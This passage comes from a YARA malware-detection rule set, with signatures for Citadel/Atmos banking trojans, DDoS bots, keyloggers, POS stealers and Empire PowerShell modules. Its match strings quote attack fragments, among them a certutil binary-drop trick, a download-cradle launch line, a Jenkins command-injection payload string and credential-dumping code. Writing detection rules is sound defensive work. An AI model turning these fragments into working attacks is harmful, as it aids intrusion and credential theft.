    $acmd1 = ":!arme"
    $acmd2 = ":!openurl"
    $acmd3 = ":!condis"
    $acmd4 = ":!httpcombo"
    $acmd5 = ":!urlblock"
    $acmd6 = ":!udp"
    $acmd7 = ":!btcwallet"
  condition:
    (all of ($cmd*) and 3 of ($msg*)) or (5 of ($amsg*) and 5 of ($acmd*))
}

rule Atmos_Malware {
  meta:
    description = "Generic Spyware.Citadel.Atmos Signature"
    author = "xylitol@temari.fr"
    reference = "http://www.xylibox.com/2016/02/citadel-0011-atmos.html"
    date = "20/08/2016"
  strings:
    $MZ = { 4D 5A }
    $LKEY = "533D9226E4C1CE0A9815DBEB19235AE4" ascii wide
    $TS1 = "X-TS-Rule-Name: %s" ascii wide
    $TS2 = "X-TS-Rule-PatternID: %u" ascii wide
    $TS3 = "X-TS-BotID: %s" ascii wide
    $TS4 = "X-TS-Domain: %s" ascii wide
    $TS5 = "X-TS-SessionID: %s" ascii wide
    $TS6 = "X-TS-Header-Cookie: %S" ascii wide
    $TS7 = "X-TS-Header-Referer: %S" ascii wide
    $TS8 = "X-TS-Header-AcceptEncoding: %S" ascii wide
    $TS9 = "X-TS-Header-AcceptLanguage: %S" ascii wide
    $TS10 = "X-TS-Header-UserAgent: %S" ascii wide
    $VNC1 = "_hvnc_init@4" ascii wide
    $VNC2 = "_hvnc_uninit@0" ascii wide
    $VNC3 = "_hvnc_start@8" ascii wide
    $VNC4 = "_hvnc_stop@0" ascii wide
    $VNC5 = "_hvnc_wait@0" ascii wide
    $VNC6 = "_hvnc_work@0" ascii wide
    $WB1 = "nspr4.dll" ascii wide
    $WB2 = "nss3.dll" ascii wide
    $WB3 = "chrome.dll" ascii wide
    $WB4 = "Internet Explorer" ascii wide
    $WB5 = "Firefox" ascii wide
    $WB6 = "Chrome" ascii wide
  condition:
    ($MZ at 0 and $LKEY) and ((5 of ($TS*) and all of ($WB*)) or (3 of ($VNC*) and all of ($WB*))) and filesize < 307200
}

rule Atmos_Packed_Malware {
  meta:
    description = "Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer"
    author = "xylitol@temari.fr"
    reference = "http://www.xylibox.com/2016/02/citadel-0011-atmos.html"
    date = "20/08/2016"
  strings:
    $MZ = { 4D 5A }
    $a = { 55 8B EC 83 EC 0C 53 56 8B 35 ?? ?? ?? 00 57 33 DB BF 00 28 00 00 }
    $b = { 68 ?? ?? ?? ?? FF 15 ?? ?? ?? 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 }
    $c = { 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 }
    $d = { 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 }
    $e = { 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 ?? 6A FF FF 75 08 FF 15 ?? ?? ?? 00 }
  condition:
    all of them and filesize < 307200
}

rule Atmos_Builder {
  meta:
    description = "Generic signature for Hacktool.Atmos.Builder cracked version"
    author = "xylitol@temari.fr"
    reference = "http://www.xylibox.com/2016/02/citadel-0011-atmos.html"
    date = "20/08/2016"
  strings:
    $MZ = { 4D 5A }
    $LKEY = "533D9226E4C1CE0A9815DBEB19235AE4" ascii wide
    $HWID = "D19FC0FB14BE23BCF35DA427951BB5AE" ascii wide
    $s1 = "url_loader=%S" ascii wide
    $s2 = "url_webinjects=%S" ascii wide
    $s3 = "url_tokenspy=%S" ascii wide
    $s4 = "file_webinjects=%S" ascii wide
    $s5 = "moneyparser.enabled=%u" ascii wide
    $s6 = "enable_luhn10_post=%u" ascii wide
    $s7 = "insidevm_enable=%u" ascii wide
    $s8 = "disable_antivirus=%u" ascii wide
  condition:
    $MZ at 0 and $LKEY and $HWID and all of ($s*)
}

rule custom_ssh_backdoor_server {
  meta:
    description = "Custome SSH backdoor based on python and paramiko - file server.py"
    author = "Florian Roth"
    reference = "https://goo.gl/S46L3o"
    date = "2015-05-14"
    hash = "0953b6c2181249b94282ca5736471f85d80d41c9"
  strings:
    $s0 = "command= raw_input(\"Enter command: \").strip('n')" ascii fullword
    $s1 = "print '[-] (Failed to load moduli -- gex will be unsupported.)'" ascii fullword
    $s2 = "print '[-] Listen/bind/accept failed: ' + str(e)" ascii fullword
    $s3 = "chan.send(command)" ascii fullword
    $s4 = "print '[-] SSH negotiation failed.'" ascii fullword
    $s5 = "except paramiko.SSHException, x:" ascii fullword
  condition:
    filesize < 10240 and 5 of them
}

rule backoff {
  meta:
    author = "Brian Wallace @botnet_hunter"
    author_email = "bwall@ballastsecurity.net"
    date = "2014-08-21"
    description = "Identify Backoff"
  strings:
    $s1 = "&op=%d&id=%s&ui=%s&wv=%d&gr=%s&bv=%s"
    $s2 = "%s @ %s"
    $s3 = "Upload KeyLogs"
  condition:
    all of them
}

rule BangatCode {
  meta:
    description = "Bangat code features"
    author = "Seth Hardy"
    last_modified = "2014-07-10"
  strings:
    $ = { FE 4D ?? 8D 4? ?? 50 5? FF }
  condition:
    any of them
}

rule BangatStrings {
  meta:
    description = "Bangat Identifying Strings"
    author = "Seth Hardy"
    last_modified = "2014-07-10"
  strings:
    $lib1 = "DreatePipe"
    $lib2 = "HetSystemDirectoryA"
    $lib3 = "SeleaseMutex"
    $lib4 = "DloseWindowStation"
    $lib5 = "DontrolService"
    $file = "~hhC2F~.tmp"
    $mc = "~_MC_3~"
  condition:
    all of ($lib*) or $file or $mc
}

rule Bangat {
  meta:
    description = "Bangat"
    author = "Seth Hardy"
    last_modified = "2014-07-10"
  condition:
    BangatCode or BangatStrings
}

rule Batel_export_function {
  meta:
    author = "@j0sm1"
    date = "2016/10/15"
    description = "Batel backdoor"
    reference = "https://www.symantec.com/security_response/writeup.jsp?docid=2016-091923-4146-99"
    filetype = "binary"
  condition:
    pe.exports("run_shell") and pe.imports("kernel32.dll", "GetTickCount") and pe.imports("kernel32.dll", "IsDebuggerPresent") and pe.imports("msvcr100.dll", "_crt_debugger_hook") and pe.imports("kernel32.dll", "TerminateProcess") and pe.imports("kernel32.dll", "UnhandledExceptionFilter")
}

rule BlackRev {
  meta:
    author = "Dennis Schwarz"
    date = "2013-05-21"
    description = "Black Revolution DDoS Malware. http://www.arbornetworks.com/asert/2013/05/the-revolution-will-be-written-in-delphi/"
    origin = "https://github.com/arbor/yara/blob/master/blackrev.yara"
  strings:
    $base1 = "http"
    $base2 = "simple"
    $base3 = "loginpost"
    $base4 = "datapost"
    $opt1 = "blackrev"
    $opt2 = "stop"
    $opt3 = "die"
    $opt4 = "sleep"
    $opt5 = "syn"
    $opt6 = "udp"
    $opt7 = "udpdata"
    $opt8 = "icmp"
    $opt9 = "antiddos"
    $opt10 = "range"
    $opt11 = "fastddos"
    $opt12 = "slowhttp"
    $opt13 = "allhttp"
    $opt14 = "tcpdata"
    $opt15 = "dataget"
  condition:
    all of ($base*) and 5 of ($opt*)
}

rule BlackWorm {
  meta:
    author = "Brian Wallace @botnet_hunter"
    author_email = "bwall@ballastsecurity.net"
    date = "2015-05-20"
    description = "Identify BlackWorm"
  strings:
    $str1 = "m_ComputerObjectProvider"
    $str2 = "MyWebServices"
    $str3 = "get_ExecutablePath"
    $str4 = "get_WebServices"
    $str5 = "My.WebServices"
    $str6 = "My.User"
    $str7 = "m_UserObjectProvider"
    $str8 = "DelegateCallback"
    $str9 = "TargetMethod"
    $str10 = "000004b0" wide
    $str11 = "Microsoft Corporation" wide
  condition:
    all of them
}

rule BoousetCode {
  meta:
    description = "Boouset code tricks"
    author = "Seth Hardy"
    last_modified = "2014-06-19"
  strings:
    $boousetdat = { C6 ?? ?? ?? ?? 00 62 C6 ?? ?? ?? ?? 00 6F C6 ?? ?? ?? ?? 00 6F C6 ?? ?? ?? ?? 00 75 }
  condition:
    any of them
}

rule Bublik {
  meta:
    author = "Kevin Falcoz"
    date = "29/09/2013"
    description = "Bublik Trojan Downloader"
  strings:
    $signature1 = { 63 6F 6E 73 6F 6C 61 73 }
    $signature2 = { 63 6C 55 6E 00 69 6E 66 6F 2E 69 6E 69 }
  condition:
    $signature1 and $signature2
}

rule Win32_Buzus_Softpulse {
  meta:
    description = "Trojan Buzus / Softpulse"
    author = "Florian Roth"
    date = "2015-05-13"
    hash = "2f6df200e63a86768471399a74180466d2e99ea9"
    score = 75
  strings:
    $x1 = "pi4izd6vp0.com" ascii fullword
    $s1 = "SELECT * FROM Win32_Process" wide fullword
    $s4 = "CurrentVersion\\Uninstall\\avast" wide fullword
    $s5 = "Find_RepeatProcess" ascii fullword
    $s6 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\" wide fullword
    $s7 = "myapp.exe" ascii fullword
    $s14 = "/c ping -n 1 www.google" wide
  condition:
    uint16(0) == 23117 and (($x1 and 2 of ($s*)) or all of ($s*))
}

rule CAP_HookExKeylogger {
  meta:
    author = "Brian C. Bell -- @biebsmalwareguy"
    reference = "https://github.com/DFIRnotes/rules/blob/master/CAP_HookExKeylogger.yar"
  strings:
    $str_Win32hookapi = "SetWindowsHookEx" nocase
    $str_Win32llkey = "WH_KEYBOARD_LL" nocase
    $str_Win32key = "WH_KEYBOARD" nocase
  condition:
    2 of them
}

rule ChickenDOS {
  meta:
    author = "Jason Jones <jasonjones@arbor.net>"
    description = "Win32-variant of Chicken ident for both dropper and dropped file"
    source = "https://github.com/arbor/yara/blob/master/chicken.yara"
  strings:
    $pdb1 = "\\Chicken\\Release\\svchost.pdb"
    $pdb2 = "\\IntergrateCHK\\Release\\IntergrateCHK.pdb"
    $str2 = "fake.cf"
    $str3 = "8.8.8.8"
    $str4 = "Processor(%d)\\"
    $str5 = "DbProtectSupport"
    $str1 = "dm1712/`jvpnpkte/bpl"
    $str6 = "InstallService NPF %d"
    $str7 = "68961"
    $str8 = "InstallService DbProtectSupport %d"
    $str9 = "C:\\Program Files\\DbProtectSupport\\npf.sys"
  condition:
    ($pdb1 or $pdb2) and 5 of ($str*)
}

rule ChickenDOS_Linux {
  meta:
    author = "Jason Jones <jasonjones@arbor.net>"
    description = "Linux-variant of Chicken ident for both dropper and dropped file"
    source = "https://github.com/arbor/yara/blob/master/chicken.yara"
  strings:
    $cfg = "fake.cfg"
    $file1 = "ThreadAttack.cpp"
    $file2 = "Fake.cpp"
    $str1 = "dns_array"
    $str2 = "DomainRandEx"
    $str3 = "cpu %llu %llu %llu %llu"
    $str4 = "[ %02d.%02d %02d:%02d:%02d.%03ld ] [%lu] [%s] %s" ascii
  condition:
    $cfg and all of ($file*) and 3 of ($str*)
}

rule citadel13xy {
  meta:
    author = "Jean-Philippe Teissier / @Jipe_"
    description = "Citadel 1.5.x.y trojan banker"
    date = "2013-01-12"
    version = "1.0"
    filetype = "memory"
  strings:
    $a = "Coded by BRIAN KREBS for personnal use only. I love my job & wife."
    $b = "http://%02x%02x%02x%02x%02x%02x%02x%02x.com/%02x%02x%02x%02x/%02x%02x%02x%02x%02x.php"
    $c = "%BOTID%"
    $d = "%BOTNET%"
    $e = "cit_video.module"
    $f = "bc_remove"
    $g = "bc_add"
    $ggurl = "http://www.google.com/webhp"
  condition:
    3 of them
}

rule Citadel_Malware {
  meta:
    author = "xylitol@temari.fr"
    date = "2015-10-08"
    description = "Search for nss3.dll pattern indicating an hexed copy of Citadel malware to work on firefox > v23.0"
  strings:
    $s1 = "Coded by BRIAN KREBS for personal use only. I love my job & wife" ascii wide
    $s2 = "nss3.dll" ascii wide
    $h1 = { 8B C7 EB F5 55 8B EC }
    $h2 = { 55 8B EC 83 EC 0C 8A 82 00 01 00 00 }
    $h3 = { 3D D0 FF 1F 03 77 ?? 83 7D }
    $h4 = { 83 F9 66 74 ?? 83 F9 6E 74 ?? 83 F9 76 74 ?? 83 F9 7A }
  condition:
    all of ($s*) and 2 of ($h*)
}

rule Binary_Drop_Certutil {
  meta:
    description = "Drop binary as base64 encoded cert trick"
    author = "Florian Roth"
    reference = "https://goo.gl/9DNn8q"
    date = "2015-07-15"
    score = 70
  strings:
    $s0 = "echo -----BEGIN CERTIFICATE----- >" ascii
    $s1 = "echo -----END CERTIFICATE----- >>" ascii
    $s2 = "certutil -decode " ascii
  condition:
    filesize < 10240 and all of them
}

rule StegoKatz {
  meta:
    description = "Encoded Mimikatz in other file types"
    author = "Florian Roth"
    reference = "https://goo.gl/jWPBBY"
    date = "2015-09-11"
    score = 70
  strings:
    $s1 = "VC92Ny9TSXZMNk5jLy8vOUlqUTFVRlFNQTZMLysvdjlJaTh2L0ZUNXJBUUJJaTFRa1NFaUx6K2hWSS8vL1NJME44bklCQU9pZC92Ny9USTJjSkpBQUFBQXp3RW1MV3hCSmkyc1lTWXR6S0VtTDQxL0R6TXhNaTl4SmlWc0lUWWxMSUUySlF4aFZWbGRCVkVGVlFWWkJWMGlCN1BBQUFBQklnMlFrYUFDNE1BQUFBRW1MNkVTTmNPQ0pSQ1JnaVVRa1pFbU5RN0JKaTlsTWpRWFBGQU1BU0ls" ascii
    $s2 = "Rpd3ovN3FlalVtNklLQ0xNNGtOV1BiY0VOVHROT0Zud25CWGN0WS9BcEdMR28rK01OWm85Nm9xMlNnY1U5aTgrSTBvNkFob1FOTzRHQWdtUElEVmlqald0Tk90b2FmN01ESWJUQkF5T0pYbTB4bFVHRTBZWEFWOXVoNHBkQnRrS0VFWWVBSEE2TDFzU0c5a2ZFTEc3QWd4WTBYY1l3ZzB6QUFXS09JZE9wQVhEK3lnS3lsR3B5Q1ljR1NJdFNseGZKWUlVVkNFdEZPVjRJUldERUl1QXpKZ2pCQWdsd0Va" ascii
  condition:
    filesize < 1024000 and 1 of them
}

rule CookiesStrings {
  meta:
    description = "Cookies Identifying Strings"
    author = "Seth Hardy"
    last_modified = "2014-06-20"
  strings:
    $zip1 = "ntdll.exePK"
    $zip2 = "AcroRd32.exePK"
    $zip3 = "Setup=ntdll.exe\x0d\x0aSilent=1\x0d\x0a"
    $zip4 = "Setup=%temp%\\AcroRd32.exe\x0d\x0a"
    $exe1 = "Leave GetCommand!"
    $exe2 = "perform exe success!"
    $exe3 = "perform exe failure!"
    $exe4 = "Entry SendCommandReq!"
    $exe5 = "Reqfile not exist!"
    $exe6 = "LeaveDealUpfile!"
    $exe7 = "Entry PostData!"
    $exe8 = "Leave PostFile!"
    $exe9 = "Entry PostFile!"
    $exe10 = "\\unknow.zip" ascii wide
    $exe11 = "the url no respon!"
  condition:
    (2 of ($zip*)) or (2 of ($exe*))
}

rule Cookies {
  meta:
    description = "Cookies"
    author = "Seth Hardy"
    last_modified = "2014-06-20"
  condition:
    CookiesStrings
}

rule CorkowDLL {
  meta:
    description = "Rule to detect the Corkow DLL files"
    reference = "IB-Group | http://www.group-ib.ru/brochures/Group-IB-Corkow-Report-EN.pdf"
  strings:
    $mz = { 4D 5A }
    $binary1 = { 60 [0-8] 9C [0-8] BB ?? ?? ?? ?? [0-8] 81 EB ?? ?? ?? ?? [0-8] E8 ?? 00 00 00 [0-8] 58 [0-8] 2B C3 }
    $binary2 = { ( FF 75 ?? | 53 ) FF 75 10 FF 75 0C FF 75 08 E8 ?? ?? ?? ?? [3-9] C9 C2 0C 00 }
    $export1 = "Control_RunDLL"
    $export2 = "ServiceMain"
    $export3 = "DllGetClassObject"
  condition:
    ($mz at 0) and ($binary1 and $binary2) and any of ($export*)
}

rule cxpidStrings {
  meta:
    description = "cxpid Identifying Strings"
    author = "Seth Hardy"
    last_modified = "2014-06-23"
  strings:
    $ = "/cxpid/submit.php?SessionID="
    $ = "/cxgid/"
    $ = "E21BC52BEA2FEF26D005CF"
    $ = "E21BC52BEA39E435C40CD8"
    $ = "                   -,L-,O+,Q-,R-,Y-,S-"
  condition:
    any of them
}

rule cxpidCode {
  meta:
    description = "cxpid code features"
    author = "Seth Hardy"
    last_modified = "2014-06-23"
  strings:
    $entryjunk = { 55 8B EC B9 38 04 00 00 6A 00 6A 00 49 75 F9 }
  condition:
    any of them
}

rule Cythosia {
  meta:
    author = "Brian Wallace @botnet_hunter"
    author_email = "bwall@ballastsecurity.net"
    date = "2015-03-21"
    description = "Identify Cythosia"
  strings:
    $str1 = "HarvesterSocksBot.Properties.Resources" wide
  condition:
    all of them
}

rule DDosTf {
  meta:
    author = "benkow_ - MalwareMustDie"
    reference = "http://blog.malwaremustdie.org/2016/01/mmd-0048-2016-ddostf-new-elf-windows.html"
    description = "Rule to detect ELF.DDosTf infection"
  strings:
    $st0 = "ddos.tf"
    $st1 = { E8 AE BE E7 BD AE 54 43 50 5F 4B 45 45 50 49 4E 54 56 4C E9 94 99 E8 AF AF EF BC 9A 00 }
    $st2 = { E8 AE BE E7 BD AE 54 43 50 5F 4B 45 45 50 43 4E 54 E9 94 99 E8 AF AF EF BC 9A 00 }
    $st3 = "Accept-Language: zh"
    $st4 = "%d Kb/bps|%d%%"
  condition:
    all of them
}

rule Derkziel {
  meta:
    description = "Derkziel info stealer (Steam, Opera, Yandex, ...)"
    author = "The Malware Hunter"
    filetype = "pe"
    date = "2015-11"
    md5 = "f5956953b7a4acab2e6fa478c0015972"
    site = "https://zoo.mlw.re/samples/f5956953b7a4acab2e6fa478c0015972"
    reference = "https://bhf.su/threads/137898/"
  strings:
    $drz = "{!}DRZ{!}"
    $ua = "User-Agent: Uploador"
    $steam = "SteamAppData.vdf"
    $login = "loginusers.vdf"
    $config = "config.vdf"
  condition:
    all of them
}

rule Dexter_Malware {
  meta:
    description = "Detects the Dexter Trojan/Agent http://goo.gl/oBvy8b"
    author = "Florian Roth"
    reference = "http://goo.gl/oBvy8b"
    date = "2015/02/10"
    score = 70
  strings:
    $s0 = "Java Security Plugin" wide fullword
    $s1 = "%s\\%s\\%s.exe" wide fullword
    $s2 = "Sun Java Security Plugin" wide fullword
    $s3 = "\\Internet Explorer\\iexplore.exe" wide fullword
  condition:
    all of them
}

rule dexter_strings {
  meta:
    author = "Brian Wallace @botnet_hunter"
    author_email = "bwall@ballastsecurity.net"
    date = "2014-09-10"
    description = "Identify Dexter POSGrabber"
  strings:
    $s1 = "UpdateMutex:"
    $s2 = "response="
    $s3 = "page="
    $s4 = "scanin:"
  condition:
    all of them
}

rule diamond_fox {
  meta:
    author = "Brian Wallace @botnet_hunter"
    author_email = "bwall@ballastsecurity.net"
    date = "2015-08-22"
    description = "Identify DiamondFox"
  strings:
    $s1 = "UPDATE_B"
    $s2 = "UNISTALL_B"
    $s3 = "S_PROTECT"
    $s4 = "P_WALLET"
    $s5 = "GR_COMMAND"
    $s6 = "FTPUPLOAD"
  condition:
    all of them
}

rule DirtJumper_drive {
  meta:
    author = "Jason Jones <jasonjones@arbor.net>"
    date = "2013-08-26"
    description = "Identify first version of drive DDoS malware"
    source = "https://github.com/arbor/yara/blob/master/drive.yara"
  strings:
    $cmd1 = "-get" fullword
    $cmd2 = "-ip" fullword
    $cmd3 = "-ip2" fullword
    $cmd4 = "-post1" fullword
    $cmd5 = "-post2" fullword
    $cmd6 = "-udp" fullword
    $str1 = "login=[1000]&pass=[1000]&password=[50]&log=[50]&passwrd=[50]&user=[50]&username=[50]&vb_login_username=[50]&vb_login_md5password=[50]"
    $str2 = "-timeout" fullword
    $str3 = "-thread" fullword
    $str4 = " Local; ru) Presto/2.10.289 Version/"
    $str5 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT"
    $newver1 = "-icmp"
    $newver2 = "<xmp>"
  condition:
    4 of ($cmd*) and all of ($str*) and not any of ($newver*)
}

rule DirtJumper_drive2 {
  meta:
    author = "Jason Jones <jasonjones@arbor.net>"
    date = "2013-08-26"
    description = "Identify newer version of drive DDoS malware"
    source = "https://github.com/arbor/yara/blob/master/drive2.yara"
  strings:
    $cmd1 = "-get" fullword
    $cmd2 = "-ip" fullword
    $cmd3 = "-ip2" fullword
    $cmd4 = "-post1" fullword
    $cmd5 = "-post2" fullword
    $cmd6 = "-udp" fullword
    $str1 = "login=[1000]&pass=[1000]&password=[50]&log=[50]&passwrd=[50]&user=[50]&username=[50]&vb_login_username=[50]&vb_login_md5password=[50]"
    $str2 = "-timeout" fullword
    $str3 = "-thread" fullword
    $str4 = " Local; ru) Presto/2.10.289 Version/"
    $str5 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT"
    $newver1 = "-icmp"
    $newver2 = "-byte"
    $newver3 = "-long"
    $newver4 = "<xmp>"
  condition:
    4 of ($cmd*) and all of ($str*) and all of ($newver*)
}

rule DirtJumper_drive3 {
  meta:
    author = "Jason Jones <jasonjones@arbor.net>"
    date = "2014-03-17"
    description = "Identify version of Drive DDoS malware using compromised sites"
    source = "https://github.com/arbor/yara/blob/master/drive3.yara"
  strings:
    $cmd1 = "-get" fullword
    $cmd2 = "-ip" fullword
    $cmd3 = "-ip2" fullword
    $cmd4 = "-post1" fullword
    $cmd5 = "-post2" fullword
    $cmd6 = "-udp" fullword
    $str1 = "login=[1000]&pass=[1000]&password=[50]&log=[50]&passwrd=[50]&user=[50]&username=[50]&vb_login_username=[50]&vb_login_md5password=[50]"
    $str2 = "-timeout" fullword
    $str3 = "-thread" fullword
    $str4 = " Local; ru) Presto/2.10.289 Version/"
    $str5 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT"
    $newver1 = "-icmp"
    $newver2 = "-byte"
    $newver3 = "-long"
    $drive3 = "99=1"
  condition:
    4 of ($cmd*) and all of ($str*) and all of ($newver*) and $drive3
}

rule eicar {
  meta:
    description = "Rule to detect Eicar pattern"
    author = "Marc Rivero | @seifreed"
    hash1 = "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f"
  strings:
    $s1 = "X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*" ascii fullword
  condition:
    all of them
}

rule Trj_Elex_Installer_NSIS {
  meta:
    author = "Centro Criptológico Nacional (CCN)"
    description = "Elex Installer NSIS"
    ref = "https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html"
  strings:
    $mz = { 4D 5A }
    $str1 = { 4E 75 6C 6C 73 6F 66 74 }
    $str2 = { B7 A2 D5 DC 0C D6 A6 3A }
  condition:
    ($mz at 0) and ($str1 at 40968) and ($str2 at 1869568)
}

rule Trj_Elex_Installer {
  meta:
    author = "Centro Criptológico Nacional (CCN)"
    description = "Elex Installer"
    ref = "https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html"
  strings:
    $mz = { 4D 5A }
    $str1 = { 65 00 76 00 65 00 72 00 79 00 74 00 68 00 69 00 6E 00 67 00 }
    $str2 = "IsWow64Process"
    $str3 = "SSFK"
  condition:
    ($mz at 0) and ($str1) and ($str2) and ($str3)
}

rule Trj_Elex_Service32 {
  meta:
    author = "Centro Criptológico Nacional (CCN)"
    description = "Elex Service 32 bits"
    ref = "https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html"
  strings:
    $mz = { 4D 5A }
    $str1 = "http://xa.xingcloud.com/v4/sof-everything/"
    $str2 = "http://www.mysearch123.com"
    $str3 = "21e223b3f0c97db3c281da1g7zccaefozzjcktmlma"
  condition:
    (pe.machine == pe.MACHINE_I386) and ($mz at 0) and ($str1) and ($str2) and ($str3)
}

rule Trj_Elex_Service64 {
  meta:
    author = "Centro Criptológico Nacional (CCN)"
    description = "Elex Service 64 bits"
    ref = "https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html"
  strings:
    $mz = { 4D 5A }
    $str1 = "http://xa.xingcloud.com/v4/sof-everything/"
    $str2 = "http://www.mysearch123.com"
    $str3 = "21e223b3f0c97db3c281da1g7zccaefozzjcktmlma"
  condition:
    (pe.machine == pe.MACHINE_AMD64) and ($mz at 0) and ($str1) and ($str2) and ($str3)
}

rule Trj_Elex_Dll32 {
  meta:
    author = "Centro Criptológico Nacional (CCN)"
    description = "Elex DLL 32 bits"
    ref = "https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html"
  strings:
    $mz = { 4D 5A }
    $str1 = { 59 00 72 00 72 00 65 00 68 00 73 00 }
    $str2 = "RookIE/1.0"
  condition:
    (pe.machine == pe.MACHINE_I386) and (pe.characteristics & pe.DLL) and ($mz at 0) and ($str1) and ($str2)
}

rule Trj_Elex_Dll64 {
  meta:
    author = "Centro Criptológico Nacional (CCN)"
    description = "Elex DLL 64 bits"
    ref = "https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html"
  strings:
    $mz = { 4D 5A }
    $str1 = { 59 00 72 00 72 00 65 00 68 00 73 00 }
    $str2 = "RookIE/1.0"
  condition:
    (pe.machine == pe.MACHINE_AMD64) and (pe.characteristics & pe.DLL) and ($mz at 0) and ($str1) and ($str2)
}

rule elknot_xor : malware {
  meta:
    author = "liuya@360.cn"
    date = "2016-04-25"
    description = "elknot/Billgates variants with XOR like C2 encryption scheme"
    reference = "http://liuya0904.blogspot.tw/2016/04/new-elknotbillgates-variant-with-xor.html"
    sample = "474429d9da170e733213940acc9a2b1c, 2579aa65a28c32778790ec1c673abc49"
  strings:
    $decrypt_c2_func_1 = { 08 83 [5] 02 75 07 81 04 24 00 01 00 00 50 E8 [4] E9 }
    $decrypt_c2_func_2 = { E8 00 00 00 00 87 [2] 83 EB 05 8D 83 [4] 83 BB [4] 02 75 05 }
  condition:
    1 of ($decrypt_c2_func_*)
}

rule Emotets {
  meta:
    author = "pekeinfo"
    date = "2017-10-18"
    description = "Emotets"
  strings:
    $mz = { 4D 5A }
    $cmovnz = { 0F 45 FB 0F 45 DE }
    $mov_esp_0 = { C7 04 24 00 00 00 00 89 44 24 0? }
    $_eax = { 89 E? 8D ?? 24 ?? 89 ?? FF D0 83 EC 04 }
  condition:
    ($mz at 0 and $_eax in (10324..16384)) and ($cmovnz or $mov_esp_0)
}

rule Empire_Invoke_MetasploitPayload {
  meta:
    description = "Detects Empire component - file Invoke-MetasploitPayload.ps1"
    author = "Florian Roth"
    reference = "https://github.com/adaptivethreat/Empire"
    date = "2016-11-05"
    hash1 = "a85ca27537ebeb79601b885b35ddff6431860b5852c6a664d32a321782808c54"
  strings:
    $s1 = "$ProcessInfo.Arguments=\"-nop -c $DownloadCradle\"" ascii fullword
    $s2 = "$PowershellExe=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'" ascii fullword
  condition:
    (uint16(0) == 30054 and filesize < 9216 and 1 of them) or all of them
}

rule Empire_Exploit_Jenkins {
  meta:
    description = "Detects Empire component - file Exploit-Jenkins.ps1"
    author = "Florian Roth"
    reference = "https://github.com/adaptivethreat/Empire"
    date = "2016-11-05"
    hash1 = "a5182cccd82bb9984b804b365e07baba78344108f225b94bd12a59081f680729"
  strings:
    $s1 = "$postdata=\"script=println+new+ProcessBuilder%28%27\"+$($Cmd)+\"" ascii
    $s2 = "$url = \"http://\"+$($Rhost)+\":\"+$($Port)+\"/script\"" ascii fullword
    $s3 = "$Cmd = [System.Web.HttpUtility]::UrlEncode($Cmd)" ascii fullword
  condition:
    (uint16(0) == 26144 and filesize < 7168 and 1 of them) or all of them
}

rule Empire_Get_SecurityPackages {
  meta:
    description = "Detects Empire component - file Get-SecurityPackages.ps1"
    author = "Florian Roth"
    reference = "https://github.com/adaptivethreat/Empire"
    date = "2016-11-05"
    hash1 = "5d06e99121cff9b0fce74b71a137501452eebbcd1e901b26bde858313ee5a9c1"
  strings:
    $s1 = "$null = $EnumBuilder.DefineLiteral('LOGON', 0x2000)" ascii fullword
    $s2 = "$EnumBuilder = $ModuleBuilder.DefineEnum('SSPI.SECPKG_FLAG', 'Public', [Int32])" ascii fullword
  condition:
    (uint16(0) == 30054 and filesize < 20480 and 1 of them) or all of them
}

rule Empire_Invoke_PowerDump {
  meta:
    description = "Detects Empire component - file Invoke-PowerDump.ps1"
    author = "Florian Roth"
    reference = "https://github.com/adaptivethreat/Empire"
    date = "2016-11-05"
    hash1 = "095c5cf5c0c8a9f9b1083302e2ba1d4e112a410e186670f9b089081113f5e0e1"
  strings:
    $x16 = "$enc = Get-PostHashdumpScript" ascii fullword
    $x19 = "$lmhash = DecryptSingleHash $rid $hbootkey $enc_lm_hash $almpassword;" ascii fullword
    $x20 = "$rc4_key = $md5.ComputeHash($hbootkey[0..0x0f] + [BitConverter]::GetBytes($rid) + $lmntstr);" ascii fullword
  condition:
    (uint16(0) == 8227 and filesize < 61440 and 1 of them) or all of them
}

rule Empire_Install_SSP {
  meta:
    description = "Detects Empire component - file Install-SSP.ps1"
    author = "Florian Roth"
    reference = "https://github.com/adaptivethreat/Empire"
    date = "2016-11-05"
    hash1 = "7fd921a23950334257dda57b99e03c1e1594d736aab2dbfe9583f99cd9b1d165"
  strings:
    $s1 = "Install-SSP -Path .\\mimilib.dll" ascii fullword
  condition:
    (uint16(0) == 30054 and filesize < 20480 and 1 of them) or all of them
}

rule Empire_Invoke_ShellcodeMSIL {
  meta:
    description = "Detects Empire component - file Invoke-ShellcodeMSIL.ps1"
    author = "Florian Roth"
    reference = "https://github.com/adaptivethreat/Empire"
    date = "2016-11-05"
    hash1 = "9a9c6c9eb67bde4a8ce2c0858e353e19627b17ee2a7215fa04a19010d3ef153f"
  strings:
    $s1 = "$FinalShellcode.Length" ascii fullword
    $s2 = "@(0x60,0xE8,0x04,0,0,0,0x61,0x31,0xC0,0xC3)" ascii fullword
    $s3 = "@(0x41,0x54,0x41,0x55,0x41,0x56,0x41,0x57," ascii fullword
    $s4 = "$TargetMethod.Invoke($null, @(0x11112222)) | Out-Null" ascii fullword
  condition:
    (uint16(0) == 30054 and filesize < 30720 and 1 of them) or all of them
}

rule Empire__Users_neo_code_Workspace_Empire_4sigs_PowerUp {
  meta:
    description = "Detects Empire component - file PowerUp.ps1"
    author = "Florian Roth"
    reference = "https://github.com/adaptivethreat/Empire"
